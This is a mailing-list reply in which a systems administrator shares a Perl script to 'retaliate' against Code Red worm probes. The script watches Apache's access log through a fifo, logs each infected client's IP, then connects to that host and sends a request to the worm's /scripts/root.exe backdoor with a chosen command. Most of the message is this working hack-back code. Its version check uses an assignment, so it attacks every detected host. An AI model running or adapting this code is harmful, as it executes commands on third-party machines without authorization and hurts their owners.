[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: FW: Careful. This is for information only.



 So creating a fifo for apache to write its access log to and a script
like this would be a faux pas then?...

 -Max

#!/usr/bin/perl
#
# Script to retaliate against Code Red Attacks.
# the author is not responsible for how you use this educational script.

use Socket;

$fifo = "/var/log/apache/apache.fifo";
$httplogfile = "/var/log/apache/access.log";
$wormlogfile = "/var/log/apache/codered.log";

# The command you want to run on the compromised machine.
$win_command = "";

#
# Shouldn't need to do anything below here
#

open (FILE, "<".$fifo) or die "cant open fifo";

while (1){
 while (<FILE>){
  &httplog;
  if ($_ =~ m/default.ida/){
   $ip = ((split " ", $_)[0]);
   &logit;
   if ($version = "2/3"){ &attack };
  } 
 }
}

# Will never get here
close FILE;
exit 0;

sub httplog {
# create normal http log
open (HTTPLOG, ">>".$httplogfile) or die "cant open http logfile";
print HTTPLOG $_;
close HTTPLOG;
}

sub logit {
# Log compromised machine
open (LOGFILE, ">>".$wormlogfile) or die "cant open logfile";
$date = ((split " ", $_)[3]);
print LOGFILE $date," - ",$ip;
if ($_ =~ m/XXXXXX/){ $version = "2/3" }
if ($_ =~ m/NNNNNN/){ $version = "1" }
else { $version = "?" };
print LOGFILE " v",$version,"]\n";
close LOGFILE;
}

sub attack {
# Attack compromised machine
local $proto = getprotobyname('tcp');
socket(osock, PF_INET, SOCK_STREAM, $proto);
local $sin = sockaddr_in(80, inet_aton($ip));
connect(osock,$sin) or &attack_failed;
print osock "GET /scripts/root.exe HTTP/1.0 \n";
print osock $win_command,"\n";
close (osock);
}

sub attack_failed {
# If Attack Fails
open (LOGFILE, ">>".$wormlogfile) or die "cant open logfile";
print LOGFILE $ip," - ATTACK FAILED\n";
close LOGFILE;
}


-- 
Max Lock, Senior Linux Systems Administrator, TELE2 Mission Control UK. 

Linux like wigwam. No windows, no gates, Apache inside.



Reply to: